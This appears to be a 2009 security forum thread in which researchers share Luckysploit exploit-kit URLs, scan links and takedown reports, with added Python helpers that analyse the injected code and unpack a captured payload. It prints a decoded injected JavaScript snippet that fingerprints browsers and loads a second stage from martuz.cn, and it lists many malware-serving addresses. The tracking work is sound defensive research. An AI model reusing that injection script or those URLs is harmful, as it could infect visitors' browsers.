Author Topic: another Luckysploit IP  (Read 46672 times)

May 26, 2009, 02:36:55 am
Reply #60

michajp

Code: [Select]
hxxp://italycruiseegypt.com/s/in.cgi?3 
redir to:
hxxp://mainssrv.com/maco/?24ed4e573fdb875bf41973b1e40e2dc1

http://www.virustotal.com/analisis/667d08f74147c71f914b09fe4f6fe559078819e23eb0e8280e9580e07c89de99-1243305061

June 05, 2009, 08:48:24 am
Reply #61

michajp

Code: [Select]
hxxp://myfucking-pussy.com/tyrek/?t=4

June 11, 2009, 06:35:39 am
Reply #62

Malware-Web-Threats

Code: [Select]
hxxp://originalsp.net/maoi/?bcba60e313aac523133482c9fe977c87
Wepawet

June 11, 2009, 12:50:57 pm
Reply #63

michajp

Code: [Select]
hxxp://213.155.29.101/vsetakoe/?5bd6b116bfc711362f0779381b812ff4

June 13, 2009, 11:24:37 am
Reply #64

michajp

Code: [Select]
hxxp://194.165.4.25/.luc/?f3d3b53b0ce86d0e3c8a48b36f12d42c/

July 24, 2009, 11:25:29 am
Reply #65

SysAdMini

redirects to Luckysploit
Code: [Select]
calid.org/pro/in.cgi?2
Luckysploit
Code: [Select]
folemio.info/vsetakoe/?036e47146bcc7ea276d378224402fef7
Ruining the bad guy's day

August 09, 2009, 08:46:33 am
Reply #66

michajp

Redirects to Luckysploit:
Code: [Select]
hxxp://mywebdesignonline.co.uk/SUD/
#Note: As you know, the Luckysploit code is usually only pushed once per IP. The above URL contains more nastiness on reload after the first push of the Luckysploit.

Luckysploit:
Code: [Select]
hxxp://122.70.145.157/.cua/?64bbea3228fa200efa17528148f6dddf

August 09, 2009, 08:54:45 am
Reply #67

MysteryFCM

Interesting open dir at mywebdesignonline.co.uk too ;)

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 09, 2009, 09:02:20 am
Reply #68

MysteryFCM

Aww, it's our old friends, lol ....

/_vti_inf.html

JS in the above file decodes to:

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");}
Could've sworn martuz.cn was already offline?

/edit

Just phoned EUKHost and was told to e-mail them as he can't deal with it till tomorrow (doesn't work Sundays apparently), so have fired an e-mail off.
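To show why many analysis profiles never get served the second stage, here is an added Python model (not code from the thread) of the gates in the decoded script above: the user-agent, cookie and run-once conditions that all have to hold before the martuz.cn script tag is written. The sandbox profiles are constructed for illustration.

```python
"""Model of the browser-side gates in the injected script from /_vti_inf.html.
Added illustration, not code from the thread; use it to check whether a crawler
or sandbox profile would ever be served the martuz.cn second stage."""

def luckysploit_gate(user_agent: str, cookie: str, already_ran: bool = False):
    """Return (fires, blocked_by), mirroring the decoded script's conditions.

    The script only writes the <script src=//martuz.cn/...> tag when:
      - the UA does not contain "Chrome"
      - the UA contains "Win" after position 0 (JS: indexOf("Win") > 0)
      - the UA does not contain "NT 6" (Vista / Server 2008 / 7 are skipped)
      - the cookie string does not contain "miek=1"
      - the global marker zrvzts is not set yet (it runs once per page)
    """
    blocked_by = []
    if "Chrome" in user_agent:
        blocked_by.append("ua contains Chrome")
    if user_agent.find("Win") <= 0:
        blocked_by.append("ua lacks Win")
    if "NT 6" in user_agent:
        blocked_by.append("ua is NT 6.x")
    if "miek=1" in cookie:
        blocked_by.append("miek=1 cookie set")
    if already_ran:
        blocked_by.append("zrvzts marker already set")
    return (not blocked_by, blocked_by)

# Constructed sandbox profiles (not from the thread): (user_agent, cookie).
PROFILES = {
    "xp_ie6": ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", ""),
    "win7_ie8": ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", ""),
    "xp_chrome": ("Mozilla/5.0 (Windows; U; Windows NT 5.1) Chrome/3.0", ""),
    "xp_ff_cookie": ("Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9) Firefox/3.0", "miek=1"),
    "linux_ff": ("Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Firefox/3.0", ""),
}

def profiles_served():
    """Names of the profiles for which the injected script would fire."""
    return sorted(n for n, (ua, ck) in PROFILES.items() if luckysploit_gate(ua, ck)[0])

if __name__ == "__main__":
    for name, (ua, ck) in PROFILES.items():
        fires, why = luckysploit_gate(ua, ck)
        print(f"{name:14} {'SERVED' if fires else 'skipped'} {why}")
```

Only the XP profile without Chrome and without the cookie passes every gate; a Windows 7 or Chrome-based sandbox would see an apparently clean page.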

August 10, 2009, 08:07:00 pm
Reply #69

MysteryFCM

EUKHost have been in touch to tell me the owner has taken this domain offline.

September 10, 2009, 08:37:39 am
Reply #70

Malware-Web-Threats

Code: [Select]
94.75.216.181/dope/?d28e33f30013d909cd5db615562e2690
mylipc.com/hjjh/?7b0d33b2f1acb347aca386aa39ea3046
lingobest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
firesaverbest.com/vsetakoe/?21983bb0a2f5476c0c4aac31c7549f5b
sebastienleabse.com/sou/?0ba3a2a491026e837182ada457aa4796
sebastienleabse.com/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)
83.133.113.14/sou/?0ba3a2a491026e837182ada457aa4796
83.133.113.14/sou/?GO++lqB32ZMxU401Y/JSCNxtAN1fkbGHDq4Sz0pzRA== (pdf)

redirects to luckysploit:
85.10.221.162
Code: [Select]
mega-tracker.info/in.cgi?4
Wepawet
Code: [Select]
wareshield.cn/jst.js
Wepawet

September 10, 2009, 12:25:55 pm
Reply #71

Serg

Hi 2 all
I'm trying to analyse a compromised web site
Code: [Select]
http://www.comanda-parfum.com/
But I got some problems...
I got PDF sploits and malware but I got a problem with the attached file. It was downloaded with the following headers
Quote
Request-ID: 13

GET hxxp://212.174.200.114/.cuo/?Z2xd/S8ZgwjJgt+hbVMvAG0dhSABFtvNQO7IQrnip+o= HTTP/1.0
Host: 212.174.200.114
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: hxxp://212.174.200.114/.cuo/?934db28b45fa5186d3f0158e2f52ac83
Cookie: login=262bb56a675e3a0a21db4b558f7ce3a2
----
Answer-ID: 13

HTTP/1.0 200 OK
Date: Thu, 10 Sep 2009 06:39:51 GMT
Content-Type: text/html
X-Powered-By: PHP/5.1.6
Content-Encoding: gzip
Content-Length: 3988
X-Cache: MISS from chicken-machine
X-Cache-Lookup: MISS from chicken-machine:3128
Connection: keep-alive
Proxy-Connection: keep-alive

Under gzip I suspect base64 encoding, but what is inside? Any ideas? Please?
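An analysis helper for the question above, added here and not posted in the thread: it splits a raw HTTP/1.0 capture, gunzips the body as the Content-Encoding header says, peels a base64 layer if the whole body looks like one, and names the inner payload by magic bytes. The sample response is constructed to mimic the quoted headers, since the real body was not posted.

```python
import base64
import gzip
import re

# Magic bytes used to name the innermost payload once the wrapping is removed.
MAGIC = [(b"%PDF", "pdf"), (b"MZ", "pe"), (b"CWS", "swf"), (b"FWS", "swf"),
         (b"PK\x03\x04", "zip"), (b"<", "html/js")]
B64_RE = re.compile(rb"^[A-Za-z0-9+/=\s]+$")

def split_http_response(raw: bytes):
    """Split a raw HTTP/1.0 response into a lower-cased header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # [0] is the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body

def unwrap(raw: bytes):
    """Peel gzip (if Content-Encoding says so) and a base64 layer; return (layers, kind, data)."""
    headers, body = split_http_response(raw)
    layers = []
    if headers.get("content-encoding") == "gzip":
        body = gzip.decompress(body)
        layers.append("gzip")
    stripped = body.strip()
    # Only treat it as base64 when the whole body is alphabet characters and long enough.
    if len(stripped) >= 16 and B64_RE.match(stripped):
        try:
            body = base64.b64decode(stripped)
            layers.append("base64")
        except ValueError:
            pass                                   # looked like base64 but was not
    kind = next((name for sig, name in MAGIC if body.startswith(sig)), "unknown")
    return layers, kind, body

def build_sample():
    """Constructed stand-in for the capture (the real body was not posted): a
    PDF-looking blob, base64-encoded, then gzip-compressed behind the quoted headers."""
    inner = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
    payload = gzip.compress(base64.b64encode(inner))
    headers = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nX-Powered-By: PHP/5.1.6\r\n"
               b"Content-Encoding: gzip\r\nContent-Length: %d\r\n\r\n" % len(payload))
    return headers + payload

if __name__ == "__main__":
    layers, kind, data = unwrap(build_sample())
    print(layers, kind, data[:24])
```

Feed `unwrap()` the raw bytes of the real capture; if it reports `unknown` after peeling, the next layer is something other than plain base64 and the first bytes of `data` are the place to look.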

September 12, 2009, 02:23:35 pm
Reply #72

michajp

Code: [Select]
hxxp://195.88.190.235/irri/?1bd3f86ca81712ec6a45340cbc884491

September 13, 2009, 01:39:57 am
Reply #73

michajp

Code: [Select]
hxxp://locationlite.com/medow/?c42fb9fe6092adcbeb2bd40c788a50a2

September 18, 2009, 01:03:54 am
Reply #74

michajp

This site contains an iFramer (but gets cleaned and reinfected several times, it seems):

Code: [Select]
hxxp://0koryu0.easter.ne.jp/
http://wepawet.iseclab.org/view.php?hash=87191810fafdd9fe9bc88fac973d712c&t=1253235673&type=js

... which leads to Luckysploit site:

Code: [Select]
hxxp://212.174.200.114/.cuo/?fef5293d546b749a15d4c5c487f39109